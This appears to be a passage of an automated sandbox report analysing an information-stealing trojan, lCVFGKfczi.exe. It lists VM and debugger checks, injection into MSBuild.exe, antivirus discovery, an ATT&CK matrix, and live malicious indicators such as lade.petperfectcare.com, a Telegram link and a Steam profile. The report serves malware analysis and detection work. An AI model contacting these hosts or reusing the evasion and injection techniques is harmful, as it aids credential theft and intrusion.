                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_3-21797
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_3-21813
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC7922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042594E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0042594E
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC2003 mov edi, dword ptr fs:[00000030h]0_2_00DC2003
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DEE385 mov eax, dword ptr fs:[00000030h]0_2_00DEE385
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DEE37A mov eax, dword ptr fs:[00000030h]0_2_00DEE37A
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DEE362 mov eax, dword ptr fs:[00000030h]0_2_00DEE362
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00E05582 mov eax, dword ptr fs:[00000030h]0_2_00E05582
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DDA64C mov eax, dword ptr fs:[00000030h]0_2_00DDA64C
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DD0F2E mov ecx, dword ptr fs:[00000030h]0_2_00DD0F2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004186AA mov eax, dword ptr fs:[00000030h]3_2_004186AA
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DDCC4B GetProcessHeap,0_2_00DDCC4B
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DC7610
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC7922
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC7AAF SetUnhandledExceptionFilter,0_2_00DC7AAF
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DCDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DCDA73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D12A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041DAAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042774E SetUnhandledExceptionFilter,3_2_0042774E

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040F54A _memset,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,3_2_0040F54A
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DB4008Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DEE076 cpuid 0_2_00DEE076
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00DDC085
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetLocaleInfoW,0_2_00DD622B
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_00E123DB
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: EnumSystemLocalesW,0_2_00DDC372
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: EnumSystemLocalesW,0_2_00DDC327
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00DDC498
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: EnumSystemLocalesW,0_2_00DDC40D
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00E1456E
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetLocaleInfoW,0_2_00DDC6EB
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00DDC814
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00DDC9E9
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: GetLocaleInfoW,0_2_00DDC91A
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_00E16A48
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00E17B38
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00E15DBC
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_00E16D66
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: EnumSystemLocalesW,0_2_00DD5D7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,3_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B1EC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B2E1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429B70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B3E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B388
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_00425503
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B5B4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_004275BC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesA,3_2_0042B676
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428EE4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429E8E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E68F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427696
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B6A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B743
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B707
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,3_2_0042E7C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lCVFGKfczi.exeCode function: 0_2_00DC7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00DC7815
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00410D2E GetTimeZoneInformation,3_2_00410D2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        411
                        Process Injection
                        1
                        Masquerading
                        OS Credential Dumping2
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        Boot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Virtualization/Sandbox Evasion
                        LSASS Memory161
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable Media2
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)411
                        Process Injection
                        Security Account Manager1
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Deobfuscate/Decode Files or Information
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput Capture14
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                        Obfuscated Files or Information
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Software Packing
                        Cached Domain Credentials1
                        Account Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading
                        DCSync1
                        System Owner/User Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                        File and Directory Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow44
                        System Information Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        lCVFGKfczi.exe37%ReversingLabsWin32.Trojan.Generic
                        lCVFGKfczi.exe100%AviraHEUR/AGEN.1310458
                        lCVFGKfczi.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://t.me/ae5ed100%URL Reputationmalware
                        https://steamcommunity.com/profiles/76561199780418869100%URL Reputationmalware
                        http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                        http://upx.sf.net0%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        199.232.214.172
                        truefalse
                          unknown
                          s-part-0017.t-0009.t-msedge.net
                          13.107.246.45
                          truefalse
                            unknown
                            lade.petperfectcare.com
                            95.164.90.97
                            truetrue
                              unknown
                              fp2e7a.wpc.phicdn.net
                              192.229.221.95
                              truefalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://steamcommunity.com/profiles/76561199780418869true
                                • URL Reputation: malware
                                unknown
                                http://lade.petperfectcare.com/true
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://lade.petperfectcare.com:80eMSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                    unknown
                                    http://lade.petperfectcare.com/fMSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://lade.petperfectcare.com/cMSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
